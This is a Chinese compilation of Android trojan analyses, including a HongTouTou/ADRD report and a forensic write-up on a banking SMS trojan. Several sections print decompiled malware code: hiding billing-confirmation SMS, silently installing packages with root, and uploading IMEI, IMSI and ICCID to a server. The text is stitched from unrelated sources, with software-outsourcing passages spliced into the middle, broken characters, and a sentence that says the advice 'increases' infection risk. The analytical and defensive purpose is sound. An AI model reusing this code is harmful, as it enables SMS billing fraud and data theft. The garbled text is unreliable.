android手机木马的提取与分析
手机木马原理

手机木马原理手机木马是一种恶意软件,通过潜藏在手机应用中感染设备并执行恶意操作。
其工作原理可分为以下几个步骤:1. 传播方式:手机木马可能通过多种方式传播,如通过恶意链接、应用下载或安装来自未知来源的应用等。
一旦用户点击或下载了木马应用,恶意软件便会开始植入和运行。
2. 植入手机系统:木马会试图植入到手机系统中,并获取系统级别的权限。
它会利用一些漏洞或系统安全性问题来获取这些权限,并绕过手机的防护机制。
3. 数据窃取:一旦木马植入成功并获取了系统权限,它就可以开始窃取用户的个人信息和敏感数据。
这些数据包括登录凭证、银行账户信息、个人通讯录等。
木马会将这些数据上传到远程控制服务器,供黑客使用或转售。
4. 远程控制:手机木马还可以被黑客远程操控。
黑客可以发送指令给木马,控制它执行各种操作,如发送短信、拍照、录音、窃取短信和通话记录等。
他们还可以利用木马发起网络攻击,感染其他设备或进行网络钓鱼。
5. 隐蔽性:为了不被用户察觉,手机木马通常会隐藏自己的图标和运行进程。
这使得用户很难察觉到手机已被感染,从而延长了恶意软件的潜伏时间。
为了保护手机免受木马感染,用户应采取以下措施:1. 下载应用时只从官方应用商店或可信的第三方应用市场下载,并注意应用的评论和评分,避免下载恶意或低评分的应用。
2. 及时更新手机操作系统和应用程序,以修复已知的漏洞和安全问题。
3. 安装可信的安全软件,及时扫描手机并清除潜在的恶意软件。
4. 禁用来自未知来源的应用安装选项,以防止恶意应用被安装。
5. 不点击来自陌生人或不可信来源的链接,尤其是不点击包含任何可疑内容的链接。
6. 注意手机的网络流量和电池消耗情况,以及不明原因的应用崩溃或手机反应迟钝等异常行为,可能是手机受到木马感染的迹象。
通过采取这些措施,用户可以增加手机木马感染的风险,保护个人信息的安全。
Android木马分析与编写

Android 木马分析与编写作者 mangel一、 Android 木马介绍Android 系统比iPhone 系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序,但这种开放性似乎也增加了安全风险。
Android Marke 本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二、 概述该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、 样本特征1. 敏感权限 <uses-permission android:name="android.permission.DELETE_PACKAGES"黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处></uses-permission> <uses-permission android:name="android.permission.INSTALL_PACKAGES" ></uses-permission> <uses-permission android:name="android.permission.READ_CONTACTS" ></uses-permission> android.setting.START_SEND_SMS android.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}(1).发送拦截短信:String str39 = "android.setting.SMS_SENT"; try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();(2). 获取ROOT 权限,安装卸载程序:private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }private void installAPK() private void uninstallPlugin() { try {int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);ComponentName localComponentName = this.mContext.startService(localIntent1); return;}(3).窃取上传隐私资料:String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String> protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处URL localURL2 = localURL1; String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod("GET"); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r "); installAPK();contains("10658166") contains("83589523")contains("客服")contains("资费")四、 行为分析运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
Android木马HongTouTou分析报告

Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Adrd.a[Clicker]病毒别名: HongTouTou、ADRD病毒类型:木马样本MD5:A84997B0D220E6A63E2943DA64FFA38C样本CRC32:A42850DE样本长度:1,316,981 字节原始文件名:Newfpwap_com_liveprintslivewallpaper.apk出现时间:2011.01.27感染系统:Android 2.0及以上二、概述ADRD木马(又名HongTouTou木马)被植入十余款合法软件中(图1),通过多家论坛、下载站点分发下载实现大范围传播。
其主要行为包括:开启多项系统服务;每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息;接收控制服务器传回的指令;从数据服务器取回30个URL;依次访问这些URL,得到30个搜索引擎结果链接;在后台逐一访问这些链接;下载一个.apk安装文件到SD卡指定目录。
感染该木马的手机将产生大量网络数据流量,从而被收取流量费用。
攻击者通过增加搜索链接的访问量而获益。
用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马,并卸载相应软件将其清除。
图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布,安天已经检测到ADRD木马(又名HongTouTou木马)被植入到下列Android 软件:●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。
木马分析报告

木马分析报告1. 引言木马(Trojan),又称为“特洛伊木马”,是指通过伪装成正常合法程序或文件进入目标系统,并在未被用户察觉的情况下,对系统进行非法操作的恶意软件。
木马程序的存在给系统安全带来了重大威胁,因此,对木马进行深入分析和研究十分必要。
本文将对一款木马进行分析,并对其传播方式、特征和危害进行探讨。
2. 木马的传播方式木马程序主要通过以下几种方式进行传播: 1. 邮件附件:木马程序常常伪装成诱人的附件,通过邮件发送给用户,一旦用户点击或下载附件,木马程序就会悄悄安装和运行。
2. 网络下载:用户在未经过恶意网站的仔细筛选的情况下,下载了含有木马的软件或文件,木马程序就会被安装到用户的系统中。
3. 可移动存储介质:如U盘、移动硬盘等存储介质中含有木马程序,只要用户将这些介质连接到自己的电脑上,木马程序就会被植入系统。
4. 动态链接库:木马程序可能会以DLL(Dynamic-Link Library)的形式出现,通过注入到正常进程中,实现对系统的控制。
3. 木马的特征为了能够更好地进行木马防护,我们需要了解木马的一些特征: 1. 欺骗性:木马程序通常伪装成合法可信的程序或文件,例如常见的.exe、.doc、.pdf等,以迷惑用户进行安装或下载。
2. 启动项修改:木马程序常常会修改系统的启动项,以保证自己能够在系统启动时自动运行,从而实现长期隐藏控制。
3. 远程控制:木马程序通常与远程服务器建立连接,以便黑客能够远程控制被感染的系统,进行各种操控、监控和窃取敏感信息等操作。
4. 系统资源占用增加:木马程序运行时会消耗大量系统资源,例如CPU和内存,从而降低系统的整体性能。
5. 网络流量增加:木马程序会通过网络上传、下载数据,导致网络流量明显增加,对网速造成影响。
4. 木马的危害与预防木马程序给系统带来的危害非常严重,包括但不限于以下几个方面: 1. 数据窃取:木马程序可以利用系统权限,窃取用户的个人隐私数据,例如登录名、密码、银行账号等。
基于Android手机录音木马的原理分析与实现

件产 品质量保证的核心部分 。 软件配置管理伴 随着软件产 品的 在迅速 发展 ,并逐渐 形成产业规模,中小规模 的软件企业也纷 整个 生命周期 , 不仅能够准确 的掌握项 目各个里程碑 阶段的实 纷 建立软件 外包联盟 。本课题主 要从软件外 包行业 的发展现 际情况 ,还能够控制软件产 品项 目的开发进度 , 使得软件产 品 状 、 目前软件外包保证 方面存在 的问题 以及影响因素三个方面 最 的开发能够及时的适应新 的需求 的变动 , 从而确保软件产 品有 进行探 讨, 终在 软件 外包 质量 保证 实施 方面给出 了具体的工 条不 紊的按照进度开展 , 在提高工作效率 的同时, 也使得 软件 作 内容 以及 关键 技术 。因此 ,只要使用合理 的技术手段 ,通过 产 品成 功开发的概率大大提升 。 最后一个技术便是检查表 以及 与 需求 以及 标准 的对 比 , 发现软件产 品存 在的 问题 并及时的进 模版 , 检查表 以及模版是形成软件产 品保证报 告的基础 , 过 行解 决,便 可以最大限度 地保证外包类软件产 品的质量 。 通 检查表 以及模 版可 以简化文档 的工作 , 但是 , 同的软件产 品 不
效率 , 短开 发周 期,提高测试 以及性 能维护的效率。软件配 软件发包方 主要 来 自欧美和 日本 。 缩 随着科学技术 的进步 , 国 我 中 置管理,作为外包软件项 目研发 的重要过程 , 软件配置 管理在 软件外 包行 业也逐渐 变得愈加的具备竞争优势 , 国各地如北
确 保外 包软件产品质量的过程 中起到 了至关重要 的作用 , 是软 京 、上海 、大连 、西安 、杭州 、合肥 等城 市的软件外包行业正
2 1. 1 突发异常状况 的准备工作 。在例外事件发生的情况 下, 当有 件导刊,0 应
Android木马Smspacem分析报告

Android木马Smspacem分析报告Android木马Smspacem分析报告安天实验室Android木马Smspacem分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Smspacem病毒类型:木马样本MD5:60CE9B29A6B9C7EE22604ED5E08E8D8A样本长度: 1855,053 字节发现时间:2011.05.22感染系统:Android 2.1及以上二、概述Smspacem木马主要行为是在开机时自启动,被该恶意软件感染的设备会自动获取手机用户通讯录中的信息(联系人名称、电话号码、Email等),自动向其联系人电话发送短信,其内容为事先编辑好的,如“现在无法通话,世界末日即将来临”等;该软件还试图访问指定的主机服务,并将从被感染设备的通讯录中获得的邮箱地址发送到远程服务器上;最后还会将被感染设备的壁纸修改为事先设定好的图像。
当被该恶意软件感染的设备接收短信时,短信将被拦截,并且该恶意软件将删除短信数据库中的短信,并且向该短信的发送地址发送一条事先编辑好的信息,如“现在无法通话,世界末日即将来临”等。
这一类的木马主要由最近关于世界末日将于2011年5月21日来临的新闻所引起。
抵御木马的关键是用户要对自己的设备进行安全设置,并在安装软件后查看其权限中是否存在敏感的权限等。
图 1 Holy软件界面及特殊权限三、样本特征3.1敏感权限●允许应用程序访问设备的手机功能:有此权限的应用程序可以确定此手机的号码和序列号、是否正在通话、以及对方的号码等。
●允许应用程序发送短信:恶意应用程序可能会不经您的确认就发送信息,给您产生费用。
●允许应用程序写入手机或 SIM 卡中存储的短信:恶意应用程序可借此删除您的信息。
●允许应用程序读取您的手机或 SIM 卡中存储的短信:恶意应用程序可借此读取您的机密信息。
●允许应用程序接收和处理短信:恶意应用程序可借此监视您的信息,或者将信息删除而不向您显示。
手机木马病毒介绍

目前智能手机系统上的木马病毒程序已经泛滥,特别是An droid系统开源且水货、刷机行为较多,成为木马病毒的主要攻击方向。
Andro id系统的木马病毒系统可分为如下主要特征:1、获取硬件信息,如IMEI、IMSI等2、访问特定网站,增加流量或通话费用3、窃取用户通话及短信信息4、窃取用户键盘输入的敏感信息在以上特点中,第三和第四点对手机银行的危险性最大,木马能够窃取客户输入的用户名、密码以及手机交易码信息,并发送远程服务器。
1、窃取用户通话及短信信息木马介绍2011年11月,信息安全厂商卡巴斯基发表分析文章,介绍智能手机ZitM o (Zeu S-in-the-M obile)木马是如何盗取用户重要数据的。
手机交易码曾被认为是最可靠的网银安全保护措施之一。
然而,随着专门针对智能手机的Zeu S木马出现,特别是Z euS-i n-the-Mobi le或Zi tMo–m TANs的出现,手机交易码已不能确保用户的重要数据不会落入网络罪犯的手中。
Zit Mo 于2010年9月首次被检测到,专门用来盗取由银行发送的短信息中的m TAN代码,也是迄今为止最受关注的手机安全事件之一。
网络安全专家分析称,“首先,该病毒具有跨平台传播的能力,无论是S ymbia n、Win dowsMobil e、Bla ckber ry和An droid系统,都被检测到了这种木马,其目的主要是将手机交易码短信息转发给网络罪犯(或者是一台服务器),后者进而可以利用这些被侵入的银行账户进行非法交易。
但是,ZitMo最大的特点是它与台式计算机木马ZeuS背后的关系。
如果没有后者的话,Z itMo仅仅能起到一个转发短信息的间谍程序作用。
手机木马实验报告

手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件,它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。
为了深入了解手机木马的工作原理和危害程度,我们进行了一系列的实验。
2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为,评估其对手机和用户的威胁程度,以及提供相应的防护建议。
3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。
通过下载一款模拟手机木马的应用程序,并在实验过程中监测其行为,我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。
4. 实验结果在实验过程中,我们观察到以下几个现象:4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息,如联系人、短信、通话记录等。
我们发现,模拟的手机木马成功地获取了手机中的敏感信息,并将其上传到了远程服务器上。
4.2 功能控制手机木马可以远程控制手机的各项功能,包括拍照、录音、发送短信等。
我们测试了模拟木马的远程控制功能,发现它能够远程激活手机的摄像头,并将拍摄到的照片发送到远程服务器。
4.3 自我传播手机木马可以通过各种方式自我传播,如通过短信、应用商店等。
我们模拟了手机木马的传播行为,并观察到它成功地向其他手机发送了包含木马应用的短信,并诱导用户下载安装。
5. 结果分析通过以上实验结果,我们可以得出以下几点结论:5.1 手机木马对用户隐私的侵犯程度非常高,能够获取用户的敏感信息并传输给攻击者。
5.2 手机木马的功能控制能力使得攻击者可以远程操控手机,可能导致更严重的后果,如偷拍、窃听等。
5.3 手机木马的自我传播能力使得其传播速度非常快,可能导致大规模的感染。
6. 防护建议为了保护手机和用户的安全,我们提出以下防护建议:6.1 安装可信任的杀毒软件,并及时更新病毒库。
6.2 不要随意下载来历不明的应用程序,尤其是通过非官方渠道下载。
6.3 注意手机的权限设置,仅授权给必要的应用。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
android手机木马的提取与分析
Android手机木马病毒的提取与分析为有效侦破使用手机木马进行诈骗、盗窃等违法犯罪的案件,对手机木马病毒的特点、植入方式、运行状态进行了研究,利用
dex2jar、jdgui等工具软件查看apk文件源代码。
结合实例,讲述了如何提取关键代码与配置数据,并对手机木马病毒的危险函数、启动方式、权限列表进行分析,证明了该方法的可行性,提取了违法犯罪行为的关键线索服务于侦查办案和证据固定。
智能手机给用户带来便利的同时,手机恶意软件也在各种各样的违法活动中充当了重要角色,其中手机木马病毒犯罪日渐加速化、产业链化、智能化和隐藏化。
Android手机木马病毒主要完成植入木马、运行病毒、监控手机、盗取信息、转走钱财。
他们伪造成“XX照片”、“违章查询处理”、“开房记录查看”、“XX神器”等易于被人点击安装的方式出现,这种恶意短信中附的网址,其实就是诱导下载一个手机软件,安装后手机内并不会显示出该应用,但其中的木马病毒已植入,后台会记录下机主的一切操作,可以随时监控到手机记录。
若机主登录网银、支付宝、微信红包等,银行卡账号、密码就都被泄露了,黑客能轻易转走资金。
此类案件近期呈现高发的趋势。
面对各种各样善于伪装隐藏的手机木马病毒,如
何提取分析,并固定证据成为一项重要工作。
本文从Android手机木马病毒的特点入手,讲述了如何提取分析关键代码与配置数据,从而分析出违法犯罪行为的关键线索服务于侦查办案和证据固定。
诈骗、盗窃的目标不变,那就是诱导点击安装短信的链接网址中的木马。
木马植入到目标系统,需要一段时间来获取信息,必须隐藏自己的行踪,以确保木马的整体隐藏能力,以便实现长期的目的。
主要包括本地隐藏、文件隐藏、进程隐藏、网络连接隐藏、内核模块隐藏、通信隐藏、协同隐藏、日志过滤和Rootkit模块的隐藏。
然后实现了Android系统下木马攻击的各种功能,主要有删除SIM卡和手机里的通讯录、删除SD卡里的文件和上传文件到电脑控制端。
1、木马病毒的植入、提取 1.1植入(1)很多用户不希望支付软件费用,含有木马的手机应用的第三方网站通过提供破解版、修改版来诱骗下载。
(2)通过发送短信或彩信到用户手机,诱骗手机用户点击短信中URL或者打开彩信附件,从而达到了植入木马的目的。
带网址链接的短信诈骗是目前十分流行的诈骗方式,短信内容不断变化,但对于手机系统来讲,为了能够及时有效的发现手机病毒木马程序必须采用动静结合的方式。
通过对Android运行任务进行检查可以发现是否有可疑程序在运行。
1.2提取提取的方式,一是根据URL链接地址,从互联网上进行提取;二是
根据手机存储的位置,找到安装文件进行提取,比较常见的提取位置有:一般存放在根目录下、DownLoad文件夹中、还有隐藏在系统文件system文件夹中;三是遇到URL 无法打开,安装源文件被删除等情况,借助豌豆荚、360手机助手等工具软件,从应用程序找出木马病毒进行导出成apk文件。
2、木马病毒的分析Android木马程序由client端程序和server端程序组成,server端通过移动互联网控制client端,client端程序安装在目标手机上,接收控制端的一些命令并执行,同时把结果返回给控制端,android木马带来的危害主要是远程窃密、通话监听、信息截获和伪造欺骗。
Android手机木马病毒程序是以APK文件形式存在的,JAVAAPK是基于JAVA开发的,JAVA可以用的反编译要比其他高级语言容易实现。
在的优势之一就是APKapktool、DoAPK、apkmanager、Dex2jarJAVA环境中图片、文件反编译,Jar语言资源等文件。
一个生成应用程序的APKXML和jdgui等工具将文件结构为:配置、JAVA“源代码和配置文件”、““res\classes.dex存放资源件””Dalvik码、、
“AndroidManifest.xmMETAINF\“resources.arsc程序全局”编译后的二进制资源文件。
其中classes.dex和AndroidManifest.xml是侦查破案工作中分析的重点。
AndroidManifest.xml是程序全局配置文件,描述应用的名
字、版本、权限、引用库文件等信息,每一个应用程序的根目录都会有一个classes.dex接运行的执行程序,是Dalvik字节码,利用解析工具可以将其转换为可以在AndroidAndroidManifest.xmlDalvik虚拟机上直文件;Java 源代码进行阅读和理解。
本文通过介绍一种新型的木马病毒程序MM.APK发送到多位用户手机,来对Android系统中的木马进行分析。
该款病毒程序接收到银行发送的转账验证码,造成财产损失20余万元。
2.1AndroidManifest.xml 该新型木马程序,AndroidManifest.xml文件定义的功能有:启动服务、tActionActivityForResult、获取邮件获取用户SessionID(手机串号、获取本机电话号码、)、添加View、调用读取文件、Intent的激活se?tent件、、传递附加信息、、注册初ContentObserverURL、发送短信、、登录邮箱、初始化
In?App读取手机短信、隐藏桌面快捷图标、获取运行写入文件、service发送邮共享数据等功能。
2.2classes.dex、查询文件gui使用dex2jar工具对classes.dex文件进行反编译,再使用jd?信点击下载到手机后会自动安装并在后台运行,工具来查看源代码文件的具体内容。
首先,该程序通过短手机界面会自动隐藏图标;其次,MM.APK软件安装成功后会向特定手机号码136***********************8120发送安装成功信息,下面是木马病毒功能分析:
android/app/NotificationManager;->notify危险函数ContentResolver;->query信息通知栏java/net/URL;-
>openConnection读取联系人、短信等数据库SmsReceiver;->abortBroadcast连接URLSmsManager;->sendMultipartTextMessage拦截短信接收SmsManager;->sendTextMessage发送彩信TelephonyManager;->getLine1Number发送普通短信ContentResolver;->delete获取手机号、删除短信、联系人动服务tvthrbbfff.abr6yyhr.BootReceiver监控短信(收到短信)启
tvthrbbfff.abr6yyhr.BootReceivertvthrbbfff.abr6yyhr.BootRec eiver开机启动服务stateReceiver屏幕解锁启动服务网络连接改变时启
tvthrbbfff.abr6yyhr.SmsReceiver监控短信(收到短信)启tvthrbbfff.abr6yyhr.SmsReceiver屏幕解锁启动服务android.permission.READ SMS权限列表
android.permission.WRITE SMS读取短信
android.permission.SEND SMS写短信
android.permission.RECEIVE SMS发送短信
android.permission.READ PHONE STATE监控接收短信android.permission.READ CONTACTS读取联系人信息读取电话状态信息android.permission.RECEIVE WAP PUSH接收
wappushandroid.permission.RECEIVE
MMSandroid.permission.CALL PHONE接收彩信视、修改有关拨出电话android.permission.PROCESS OUTGOING CALLS拨打电话监android.permission.INTERNET连接网络(2G状态(android.permission.ACCESS NETWORK STATE 或2G或3G)读取网络3G)状态
android.permission.ACCESS WIFI STATE读取wifi网络android.permission.READ LOGS读取系统日志3结束语通过对新型木马病毒的分析,此类型的木马程序主要是定向发送,盗窃银行卡钱财为主,嫌疑人留有实施犯罪接收的邮箱和手机号码,案件侦查人员和取证人员可以通过此类方法掌握该类木马病毒实施恶意行为的配置数据、JAVA关键代码等内容,最终确定回传方式,快速锁定犯罪嫌疑人。
但对于采用代码混淆或加壳的手机木马病毒程序,很难进行精准还原。
在具体的工作实践中,充分利用多种技术,灵活运用网络资源,分析木马病毒使用者的目的、动机,进而分析案件线索,为案件的侦破提供方向和技术执掌,充分发挥网络侦查的作用。